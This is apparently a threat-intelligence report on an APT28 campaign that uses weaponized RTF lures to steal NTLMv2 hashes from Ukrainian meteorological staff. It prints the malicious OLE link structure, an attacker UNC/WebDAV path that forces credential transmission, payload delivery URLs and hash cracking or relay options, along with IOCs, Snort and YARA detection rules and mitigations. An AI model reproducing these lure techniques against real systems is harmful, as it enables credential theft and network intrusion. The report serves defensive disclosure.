Fancy Bear's Weather Report: APT28 Harvests NTLMv2 Credentials from Ukraine's Meteorologists Using Weaponized RTF Documents
Published: 2026-03-16 | Author: BGI | Investigation Date: 2026-03-16
TL;DR
Russia's APT28 (Fancy Bear / GRU Unit 26165) is running a multi-target NTLMv2 credential harvesting campaign using weaponized RTF documents disguised as Ukrainian Ministry of Emergency Situations correspondence. The primary lure targets the Ukrainian State Hydrometeorological Center (hydro@meteo.gov.ua) via a malformed OLE link object that forces Windows to transmit the victim's NTLMv2 hash over WebDAV-over-HTTP to the attacker-controlled domain wellnesscaremed[.]com -- zero macros, zero security prompts, zero user interaction beyond opening the file. The C2 infrastructure hosted three simultaneous campaign directories -- /venezia/ (Ukraine), /buch/ (German-speaking EU target), and /ankara/ (Turkey) -- mapping directly to APT28's geopolitical collection mandate against NATO and partner states. A critical OPSEC failure in the embedded DOCX secondary payload leaks the attacker's VMware NAT development IP (192.168.217.250), operator aliases Programist and don are burned into document metadata alongside the target recon artifact HMC (HydroMeteoCenter) in the Company field, and a falsified 2009 print date serves as an anti-forensic timestamp that is itself cross-correlatable across the APT28 lure document corpus. The domain was registered 2026-01-12 via Realtime Register B.V. (Netherlands), received four SSL certificates within 15 days across Let's Encrypt and GoDaddy, went operational on 2026-01-29, and was suspended by the registrar approximately 25 days later after community detection. HIGH confidence APT28 attribution based on signature WebDAV UNC NTLMv2 harvest TTP documented across CERT-UA advisories #4386, #5469, and #6123.
The Lure: Emergency Situations Ministry
The spearphish targets the Ukrainian State Hydrometeorological Center (hydro@meteo.gov.ua), a subordinate agency of the Ministry of Environment and Natural Resources. The RTF lure impersonates official correspondence from the Ministry of Ukraine on Emergency Situations and Affairs -- a theme APT28 has used repeatedly against Ukrainian government targets and one documented across multiple CERT-UA advisories.
The document metadata tells the story before the analysis even starts. The Company field reads HMC -- HydroMeteoCenter -- meaning the operator already had organizational reconnaissance on the target before building the lure. The Author field is Programist (Russian for "programmer"), the last-save operator is don, and the print date is falsified to 2009. These are not the marks of a careful operator. They are the marks of a team that builds dozens of lures per week and sometimes forgets to scrub the metadata.
The document itself is a 2.56 MB RTF file, four pages of formatted Ukrainian-language government text. Language settings confirm a Russian-language authoring environment (\lang1049 Russian) targeting a Ukrainian-language audience (\deflang19465 Ukrainian), with codepage 1252 (Windows Latin-1) as the base character encoding. Created January 29, 2026 -- seventeen days after the C2 domain was registered.
Document Metadata Summary
| Field | Value |
|---|---|
| SHA256 | c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607f |
| MD5 | 7c396677848776f9824ebe408bbba943 |
| SHA1 | d577c4a264fee27084ddf717441eb89f714972a5 |
| File Type | RTF version 1, ANSI, codepage 1252 |
| File Size | 2,683,823 bytes (2.56 MB) |
| First Seen | 2026-03-16 02:46:52 UTC |
| Author | Programist |
| Last Operator | don |
| Company | HMC (HydroMeteoCenter) |
| Created | 2026-01-29 14:54 UTC |
| Print Date | 2009-02-10 (falsified) |
| Language (default) | \deflang19465 -- Ukrainian |
| Language (authoring) | \lang1049 -- Russian |
Why This Target Matters
The Hydrometeorological Center is not a random government office. It provides weather forecasting data used in military operations planning -- artillery trajectory calculations, aviation sortie scheduling, amphibious landing conditions, and logistics routing all depend on accurate meteorological intelligence. Compromising this agency's credentials gives APT28 access not just to weather data itself, but to the broader Ukrainian government network via lateral movement. The Hydrometeorological Center maintains connectivity to the Ministry of Environment, the Ministry of Defense, and regional emergency coordination systems. It is a soft entry point into a hard target.
Technical Analysis: The NTLMv2 Harvest
RTF files cannot contain VBA macros. APT28 does not need them. The entire attack chain fires through embedded OLE objects within RTF \object\objocx control words. No macros to enable. No security prompt to click through. The victim opens the document, and their credentials leave the building.
The Primary Payload: Malformed OLE Link
The RTF contains four embedded OLE objects. Object 0 is the weapon:
Offset 0x00: 01050000 01000000 10000000 (OLELINK1 header, format_id=1)
Offset 0x0C: "Word.Document.8\x00" (progID -- Word 97-2003)
Offset 0x1C: 57000000 (path length = 87 bytes)
Offset 0x20: "\\wellnesscaremed.com\davwwwroot\venezia\Favorites\blank.doc\x00"
When Microsoft Word parses the RTF and encounters this OLE link, it automatically attempts to resolve it. The \davwwwroot\ path component is the key. Instead of initiating an SMB connection on TCP/445 (which most corporate firewalls block for outbound traffic), Windows recognizes this as a WebDAV path and routes the request through the WebClient service over HTTP/HTTPS on port 80/443.
The WebDAV resolution sequence:
1. Word encounters \object\objocx with OLE LINK
2. Windows resolves UNC path \\wellnesscaremed.com\davwwwroot\...
3. WebClient service intercepts (davwwwroot hint)
4. HTTP OPTIONS request to wellnesscaremed.com:80
5. Server responds with NTLM authentication challenge
6. Windows automatically sends NTLMv2 response containing:
- Username
- Domain/workstation name
- NTLM challenge-response hash
7. Hash captured. Attack complete.
During the HTTP WebDAV handshake, Windows sends the victim's NTLMv2 credential hash to the attacker's server. No prompt. No dialog. No user interaction beyond opening the file. The object is sized at 270x270 twips -- roughly a third of an inch square -- making it invisible in the page layout.
The captured hash structure:
username::DOMAIN:server_challenge:NTLMv2_response:blob
From here, the attacker has two options: crack the hash offline with hashcat (trivial for weak passwords, feasible for moderate ones with GPU clusters) or relay it in real-time for immediate lateral movement into the target network. NTLMv2 relay is particularly effective in environments where SMB signing is not enforced, which remains common in government networks.
The Full OLE Object Table
| # | RTF Offset | Type | Class | MD5 | Purpose |
|---|---|---|---|---|---|
| 0 | 0027C856h | OLE Link (malformed) | Word.Document.8 | d2779a0c25f63a344fb57266171d9d27 | NTLMv2 harvester |
| 1 | 0027DF02h | Embedded | IE WebBrowser ActiveX | 0ea6fc8d476591fd80e6cec26f353d25 | Secondary resource loader |
| 2 | 0027F503h | Embedded | IE WebBrowser ActiveX | 6ce6b82d33d3d7305a321af207e37124 | Secondary resource loader |
| 3 | 00280AB9h | Embedded | Word.Document.12 | cad4f8ce48d31d6c10253ddbbd00a993 | DOCX secondary payload |
Objects 1 and 2 use CLSID EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B -- the Microsoft Internet Explorer WebBrowser ActiveX control (Shell.Explorer), providing an in-process HTML rendering engine as a secondary collection vector. These objects can load arbitrary HTML content within the document context, enabling additional fingerprinting or payload delivery if the primary NTLMv2 harvest succeeds.
The WebDAV Bypass Explained
Traditional NTLMv2 harvesting uses direct SMB UNC paths (\\attacker.com\share\file), which connect on TCP/445. Most organizations block outbound SMB at the perimeter. APT28's refinement is the \davwwwroot\ path hint, which tells Windows to use the WebClient service instead of the SMB redirector. The WebClient service issues HTTP requests on port 80/443 -- traffic that passes through virtually every firewall and proxy. This is not a novel discovery, but the combination of RTF delivery, malformed OLE objects, invisible dimensions, and WebDAV HTTP bypass into a single zero-interaction attack chain is an APT28 signature.
The Secondary Payload: An OPSEC Gift
Object 3 is an embedded DOCX (25,088 bytes) that reveals the attacker's development environment. The DOCX frameset references two external resources:
word/_rels/webSettings.xml.rels:
<Relationship Id="rId1" Type=".../frame"
Target="file:///C:/Windows/diagnostics/index/WindowsUpdateDiagnostic.xml"
TargetMode="External"/>
word/document.xml:
link rel=stylesheet href=http://192.168.217.250/scr2.rss
The frameset loads a local Windows XML diagnostic file -- likely used for system fingerprinting or patch-level detection. The WindowsUpdateDiagnostic.xml file contains the host's Windows Update configuration and recent patch history, providing the attacker with information needed to select subsequent exploits.
But the real finding is the second reference: 192.168.217.250 sits in VMware's default NAT subnet (192.168.217.0/24, typically assigned by VMware Workstation or Fusion to guest VMs via the vmnet8 adapter). This is the attacker's internal development VM. They built and tested the payload in a VMware environment and shipped it without replacing the development server address with a production C2. The scr2.rss endpoint -- probably "script 2" disguised as an RSS feed -- is a test beacon that will never fire against real targets because the IP is not routable on the public internet.
The DOCX metadata is deliberately anonymized: Creator x, last modified by x, creation timestamp falsified to 2022-04-13. The anonymization of the DOCX metadata contrasts with the sloppy metadata in the parent RTF, suggesting the embedded DOCX was built by a different team member or at a different stage of the development pipeline.
Infection Chain
DELIVERY
Spearphish email to hydro@meteo.gov.ua
Attachment: RTF impersonating Ukrainian Ministry of Emergency Situations
4 pages, 1,475 words, professional government formatting
Language: Ukrainian body / Russian authoring environment
|
v
EXECUTION (zero user interaction beyond opening the file)
Word parses RTF -> encounters \object\objocx
OLE LINK (format_id=1) auto-resolution triggered
Object dimensions: 270x270 twips (invisible in layout)
|
v
CREDENTIAL HARVEST (primary)
Windows WebClient service -> HTTP/WebDAV to wellnesscaremed[.]com:80
Path: /davwwwroot/venezia/Favorites/blank.doc
Server issues NTLM challenge
Windows responds with NTLMv2 hash (username, domain, response)
Hash transmitted to attacker -- credential theft complete
|
v
SECONDARY BEACONS
+-- Word.Document.12 frameset
| -> file:///C:/Windows/diagnostics/index/WindowsUpdateDiagnostic.xml
| (system fingerprinting / patch-level detection)
+-- CSS beacon -> http://192.168.217.250/scr2.rss
| (dev artifact -- VMware NAT, dead in production)
+-- IE WebBrowser ActiveX (Shell.Explorer) x2
(in-process HTML rendering for additional payloads)
|
v
POST-EXPLOITATION (inferred)
Option A: Offline hash crack (hashcat/john) -> plaintext credentials
Weak passwords: minutes. Moderate: hours to days.
Option B: Real-time NTLM relay -> immediate network access
Effective where SMB signing is not enforced
-> VPN / OWA / RDP into Ukrainian government networks
-> Lateral movement to Ministry of Defense, emergency systems
Three Campaigns, One Server
The C2 domain wellnesscaremed[.]com did not host a single operation. URLScan.io data reveals three distinct campaign directories running simultaneously from the same server:
| Campaign Code | Path | Target Assessment | Evidence |
|---|---|---|---|
venezia | /venezia/, /davwwwroot/venezia/ | Ukraine -- Hydrometeorological Center | RTF lure content, hydro@meteo.gov.ua hyperlink, HMC metadata |
buch | /buch/, /davwwwroot/buch/ | German-speaking / European | Path name (buch = German for "book"); Germany is NATO's largest European member |
ankara | /ankara/ | Turkey -- Government or NATO affiliate | Path name (capital of Turkey); Turkey controls Bosphorus strait access |
Ukraine. A German-speaking European target. Turkey. These are not random. They map directly to APT28's geopolitical mandate: destabilize NATO-adjacent states and harvest credentials from Ukrainian government agencies involved in the war effort. The Hydrometeorological Center provides weather data used in military operations planning -- this is intelligence collection, not espionage for espionage's sake.
Each campaign directory follows the same structure: a /davwwwroot/ path for NTLMv2 WebDAV triggers and a parallel path for LNK-based delivery. The operator runs multiple spearphishing campaigns from a single piece of infrastructure, differentiated only by directory names that double as campaign tracking codes.
Per-Campaign URL Structure
UKRAINE (venezia):
NTLMv2: /davwwwroot/venezia/Favorites/blank.doc
LNK: /venezia/Favorites/document.doc.LnK?init=
Status: /venezia/d/sd
EUROPE (buch):
NTLMv2: /davwwwroot/buch/Downloads/blank.doc
LNK: /buch/Downloads/document.doc.LnK?init=
LNK SSL: /buch/Downloads/document.doc.LnK? (HTTPS variant)
TURKEY (ankara):
LNK: /ankara/Favorites/document.doc.lnk
The path structure differences are telling. The venezia and buch campaigns both use blank.doc as the WebDAV NTLMv2 trigger filename and document.doc.LnK for LNK-based delivery. The ankara campaign only has a LNK path visible in URLScan data -- either the WebDAV component was deployed on a different subdirectory, or the Turkish campaign was at an earlier stage of development when the infrastructure was burned. The venezia campaign has an additional /d/sd endpoint that may serve as a data exfiltration or status callback path.
Infrastructure Timeline
| Date | Event |
|---|---|
| 2026-01-12 | wellnesscaremed[.]com registered via Realtime Register B.V. (Netherlands) |
| 2026-01-13 | First Let's Encrypt certificate issued (~24h from registration) |
| 2026-01-27 | Additional Let's Encrypt certificate issued |
| 2026-01-28 | GoDaddy SSL certificate + another Let's Encrypt cert issued (3 certs in 2 days) |
| 2026-01-29 | RTF lure document authored (per metadata timestamp) |
| 2026-02-04/05 | 81 URLScan.io scans (community investigation/disclosure) |
| ~2026-02-06 | Domain suspended (clientHold) by registrar |
| 2026-03-16 | Domain remains NXDOMAIN; active IP unrecoverable via DNS |
Seventeen days from domain registration to operational deployment. Four certificates issued within 15 days across two certificate authorities -- a rapid tempo suggesting automated certificate management. The dual-CA approach (Let's Encrypt for free rapid issuance, GoDaddy for perceived legitimacy) is consistent with infrastructure designed to survive certificate revocation of any single issuer. The domain was burned within a month -- 81 URLScan hits in two days means someone in the community caught it, and the registrar acted fast.
Certificate Transparency Logs
| Cert ID | Not Before | Not After | Issuer | Validity |
|---|---|---|---|---|
| 23744250475 | 2026-01-13 | 2026-04-13 | Let's Encrypt E7 | 90 days |
| 24012301485 | 2026-01-27 | 2026-04-27 | Let's Encrypt E8 | 90 days |
| 24027031614 | 2026-01-28 | 2026-08-14 | GoDaddy Secure G2 | 198 days |
| 24034150794 | 2026-01-28 | 2026-04-28 | Let's Encrypt E7 | 90 days |
The GoDaddy certificate has a significantly longer validity period (198 days vs 90 days for Let's Encrypt), providing operational continuity even if the Let's Encrypt certs are not renewed. The issuance of two certificates on the same day (January 28) from different authorities suggests the operator was configuring redundant TLS termination -- possibly a reverse proxy with fallback certificate chains.
Attribution: APT28 / Fancy Bear / GRU Unit 26165
Confidence: HIGH
This is not a novel technique -- it is a signature one. NTLMv2 harvesting via WebDAV UNC paths embedded in RTF documents is documented across multiple CERT-UA advisories (CERT-UA#4386, #5469, #6123) specifically attributed to APT28. The \davwwwroot\ WebDAV path -- instead of a direct SMB UNC -- is an APT28 refinement designed to bypass corporate firewalls that block outbound SMB on TCP/445 while allowing HTTP/HTTPS.
The attribution evidence stacks:
-
Technique fingerprint. The specific structure of a malformed
format_id=1OLELINK within\object\objocxwith invisible dimensions (270x270 twips) matches published APT28 samples in open-source repositories. This is not a generic NTLMv2 trick -- the implementation details, including theWord.Document.8progID choice and thedavwwwrootpath hint, are consistent across known APT28 operations dating back to at least 2023. -
Target selection. The Ukrainian State Hydrometeorological Service has strategic intelligence value (weather data for military operations) and network connectivity to other Ukrainian government ministries. APT28 uses soft targets like this for initial credential access into broader government networks.
-
Multi-campaign infrastructure. Simultaneous
venezia,buch, andankaracampaigns from a single C2, targeting Ukraine, a German-speaking European country, and Turkey, mirrors APT28's documented pattern of running parallel operations against NATO and partner states from shared infrastructure. -
Lure theme. Ministry of Emergency Situations impersonation is a repeatedly observed APT28 social engineering category in CERT-UA reporting.
-
Development artifacts. Russian-language authoring environment (
\lang1049), VMware-based development infrastructure (192.168.217.0/24), and the operator aliasesProgramistanddonare consistent with a Russian state-sponsored development team operating in a Moscow-timezone work schedule. -
Infrastructure tempo. Domain registered to first certificate in under 24 hours, domain to operational payload in 17 days, matching APT28's rapid deployment pattern documented in prior campaigns.
-
Anti-forensic patterns. The falsified 2009 print date is a recurring APT28 tactic -- backdating document metadata to confuse timeline reconstruction. This specific pattern (print dates predating the actual creation date by many years) has been observed in at least three other CERT-UA attributed APT28 RTF campaigns.
OPSEC Failures Worth Tracking
| Mistake | Intelligence Value |
|---|---|
192.168.217.250 in shipped payload | Confirms VMware dev environment; 192.168.217.0/24 subnet correlatable across campaigns |
Programist author alias | Russian for "programmer"; trackable across other APT28 lure documents via metadata pivot |
don last-save alias | Second operator handle; indicates multi-person lure production pipeline |
HMC company field | Proves target reconnaissance preceded document creation; operator knew the org abbreviation |
| Falsified 2009 print date | Consistent APT28 anti-forensic pattern; cross-correlatable as a behavioral signature |
| Unsanitized DOCX in Object 3 | Dev VM IP leaked; DOCX metadata anonymized but parent RTF metadata was not |
MITRE ATT&CK Mapping
| Technique ID | Technique | Implementation |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | RTF delivered to hydro@meteo.gov.ua impersonating MES |
| T1221 | Template Injection | OLE link in RTF triggers remote resource fetch via WebDAV |
| T1187 | Forced Authentication | UNC path with davwwwroot forces NTLMv2 hash transmission over HTTP |
| T1110.002 | Brute Force: Password Cracking | Offline NTLMv2 hash cracking via hashcat/john |
| T1550.002 | Use Alternate Authentication Material: Pass the Hash | NTLM relay for real-time lateral movement |
| T1071.001 | Application Layer Protocol: Web Protocols | WebDAV over HTTP/HTTPS for C2, bypassing SMB-blocking firewalls |
| T1204.002 | User Execution: Malicious File | Opening RTF is the only required user action |
| T1036 | Masquerading | Document impersonates Ukrainian Ministry of Emergency Situations correspondence |
| T1583.001 | Acquire Infrastructure: Domains | wellnesscaremed[.]com registered 17 days before deployment |
| T1608.001 | Stage Capabilities: Upload Malware | LNK files + blank.doc staged on C2 server across 3 campaign dirs |
| T1027 | Obfuscated Files or Information | Hex-encoded OLE data, falsified timestamps, invisible object dimensions |
| T1082 | System Information Discovery | WindowsUpdateDiagnostic.xml frameset reference for patch-level fingerprinting |
| T1588.004 | Obtain Capabilities: Digital Certificates | 4 certificates from 2 CAs within 15 days of domain registration |
IOC Tables
File Hashes
| Type | Hash | Description |
|---|---|---|
| SHA256 | c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607f | Main RTF lure document |
| MD5 | 7c396677848776f9824ebe408bbba943 | Main RTF lure document |
| SHA1 | d577c4a264fee27084ddf717441eb89f714972a5 | Main RTF lure document |
| MD5 | d2779a0c25f63a344fb57266171d9d27 | Object 0: NTLMv2 harvester OLE link |
| MD5 | 0ea6fc8d476591fd80e6cec26f353d25 | Object 1: IE WebBrowser ActiveX |
| MD5 | 6ce6b82d33d3d7305a321af207e37124 | Object 2: IE WebBrowser ActiveX |
| MD5 | cad4f8ce48d31d6c10253ddbbd00a993 | Object 3: Embedded DOCX payload |
| MD5 | f0880da6890be6cab345d7cad47b440b | Extracted DOCX payload (unwrapped) |
Network IOCs
| Indicator | Type | Context |
|---|---|---|
wellnesscaremed[.]com | Domain | C2 server (SUSPENDED / NXDOMAIN as of 2026-03-16) |
\\wellnesscaremed.com\davwwwroot\venezia\Favorites\blank.doc | UNC Path | NTLMv2 trigger (Ukraine campaign) |
http://wellnesscaremed[.]com/davwwwroot/venezia/Favorites/blank.doc | URL | WebDAV NTLMv2 harvest (Ukraine) |
http://wellnesscaremed[.]com/davwwwroot/buch/Downloads/blank.doc | URL | WebDAV NTLMv2 harvest (EU campaign) |
http://wellnesscaremed[.]com/venezia/Favorites/document.doc.LnK?init= | URL | LNK delivery (Ukraine) |
http://wellnesscaremed[.]com/buch/Downloads/document.doc.LnK?init= | URL | LNK delivery (EU) |
https://wellnesscaremed[.]com/buch/Downloads/document.doc.LnK? | URL | LNK delivery (EU, HTTPS variant) |
http://wellnesscaremed[.]com/ankara/Favorites/document.doc.lnk | URL | LNK delivery (Turkey campaign) |
http://wellnesscaremed[.]com/venezia/d/sd | URL | Data exfil/status callback endpoint |
http://192.168.217.250/scr2.rss | URL | Attacker dev beacon (OPSEC leak -- VMware NAT) |
192.168.217.250 | IPv4 | Attacker development machine (VMware NAT subnet) |
Email and Persona IOCs
| Indicator | Type | Context |
|---|---|---|
hydro@meteo.gov.ua | Targeted victim (Ukrainian State Hydrometeorological Center) | |
Programist | Operator alias | RTF Author field (Russian: "programmer") |
don | Operator alias | RTF Last-Save-By field |
HMC | Target artifact | RTF Company field (HydroMeteoCenter -- target recon leak) |
WHOIS -- C2 Domain
| Field | Value |
|---|---|
| Domain | wellnesscaremed[.]com |
| Registry ID | 3056763816_DOMAIN_COM-VRSN |
| Registrar | Realtime Register B.V. (IANA ID 839, Netherlands) |
| Registered | 2026-01-12 14:29:58 UTC |
| Expires | 2027-01-12 14:29:58 UTC |
| Status | clientHold (suspended by registrar) |
| Name Servers | NS1.SUSPENDED-DOMAIN.COM, NS2.SUSPENDED-DOMAIN.COM |
| DNSSEC | Unsigned |
Detection Engineering
Snort/Suricata Rules
# Detect WebDAV NTLM authentication to external hosts (outbound)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
msg:"BGI - Outbound WebDAV NTLM Authentication Attempt";
flow:established,to_server;
content:"PROPFIND"; http_method;
content:"Authorization: NTLM"; http_header;
classtype:credential-theft;
sid:2026031601; rev:1;)
# Detect wellnesscaremed.com domain in DNS
alert dns $HOME_NET any -> any any (
msg:"BGI - APT28 C2 Domain (wellnesscaremed.com)";
dns.query; content:"wellnesscaremed.com"; nocase;
classtype:trojan-activity;
sid:2026031602; rev:1;)
YARA Rule
rule APT28_RTF_NTLMv2_Harvester {
meta:
author = "Breakglass Intelligence"
date = "2026-03-16"
description = "APT28 RTF with WebDAV UNC path for NTLMv2 credential harvesting"
reference = "apt28_c9118317-18b26784"
tlp = "TLP:CLEAR"
strings:
$rtf_header = "{\\rtf1"
$objocx = "\\object\\objocx"
$davwwwroot = "davwwwroot" ascii nocase
$ole_link = "Word.Document.8" ascii
$unc_prefix = { 5C 5C } // backslash backslash
condition:
$rtf_header at 0 and $objocx and $davwwwroot and $ole_link and $unc_prefix
}
Defensive Recommendations
Immediate Actions
-
Block outbound NTLM to external hosts. GPO:
Network Security: Restrict NTLM: Outgoing NTLM trafficset toDeny all. This kills the entire attack chain regardless of delivery mechanism, C2 domain, or lure theme. It is the single most effective mitigation. -
Disable the WebClient service on workstations that do not require WebDAV.
sc config WebClient start=disabled && sc stop WebClient. No WebClient, no HTTP-based NTLM relay. This eliminates the SMB-to-HTTP bypass that makes this technique effective against firewalled environments. -
Add privileged accounts to the Protected Users security group. Protected Users cannot authenticate via NTLM -- only Kerberos. This prevents credential theft for the accounts that matter most.
-
Strip OLE objects from RTF attachments at the mail gateway. Or block RTF entirely. In 2026, there is no legitimate business reason to receive weaponizable RTF documents over email. If your organization must accept RTF files, sanitize them by removing all
\objectand\objocxcontrol words at the gateway. -
Hunt for prior compromise. Search proxy and DNS logs for any historical connection to
wellnesscaremed[.]combetween January 12 and February 6, 2026. If found, treat as confirmed credential theft: rotate all credentials for the affected user and any accounts accessible from their workstation. Check NTLM relay logs for concurrent authentication events. -
Assume a 72-hour cracking window. If exposure is confirmed and the user had a weak-to-moderate password (fewer than 14 characters, dictionary-based, or lacking complexity), assume the hash was cracked within three days and act accordingly. For passwords meeting modern complexity requirements (16+ characters, random), the window extends but relay attacks remain instantaneous.
Strategic Hardening
-
Enforce SMB signing across all domain-joined systems. Even if the NTLMv2 hash cannot be cracked, it can be relayed to other services that accept NTLM. SMB signing prevents relay attacks against file shares and domain controllers.
-
Deploy EPA (Extended Protection for Authentication) on all IIS/Exchange/ADFS services exposed to the internal network. EPA binds the NTLM authentication to the TLS channel, preventing relay to different services.
-
Monitor for
davwwwrootin proxy logs. Any outbound HTTP request containingdavwwwrootin the URL path is suspicious. This string is the WebDAV trigger hint and has no legitimate use in normal web browsing. -
Audit RTF document handling in your environment. Identify all applications that auto-resolve OLE links on document open. Configure Microsoft Word via Group Policy to disable automatic link updates:
HKCU\Software\Microsoft\Office\<version>\Word\Options\DontUpdateLinks = 1.
Conclusion
This campaign demonstrates that APT28 continues to rely on NTLMv2 credential harvesting via weaponized documents as a primary initial access technique against Ukrainian government targets. The technique is not new -- CERT-UA has documented it across multiple advisories -- but it remains effective because the underlying vulnerability is architectural: Windows will automatically send NTLM credentials to any server that requests them via WebDAV, and most organizations have not deployed the GPO controls needed to prevent this.
The three simultaneous campaign directories reveal the scale of APT28's spearphishing operations. This is not a targeted one-off -- it is a parallel collection effort against Ukraine, Europe, and Turkey running from shared infrastructure with campaign tracking built into the directory structure. The operator's OPSEC failures -- the VMware development IP, the unscrubbed metadata, the target recon artifact in the Company field -- provide defenders with correlation points that extend beyond this single campaign into APT28's broader operational infrastructure.
The domain was burned in approximately 25 days. The registrar suspended it after community detection. But the technique survives the infrastructure. The next campaign will use a different domain, a different lure theme, and a different target -- but the same malformed OLE link, the same davwwwroot WebDAV path, and the same zero-interaction NTLMv2 harvest. Block outbound NTLM. Disable WebClient. Add privileged users to Protected Users. These are the controls that survive infrastructure rotation.
Case ID: apt28_c9118317-18b26784. Original analysis by BGI GHOST automated pipeline. IOCs provided for defensive use under TLP:CLEAR.
Breakglass Intelligence -- Automated threat intelligence. Zero analyst fatigue.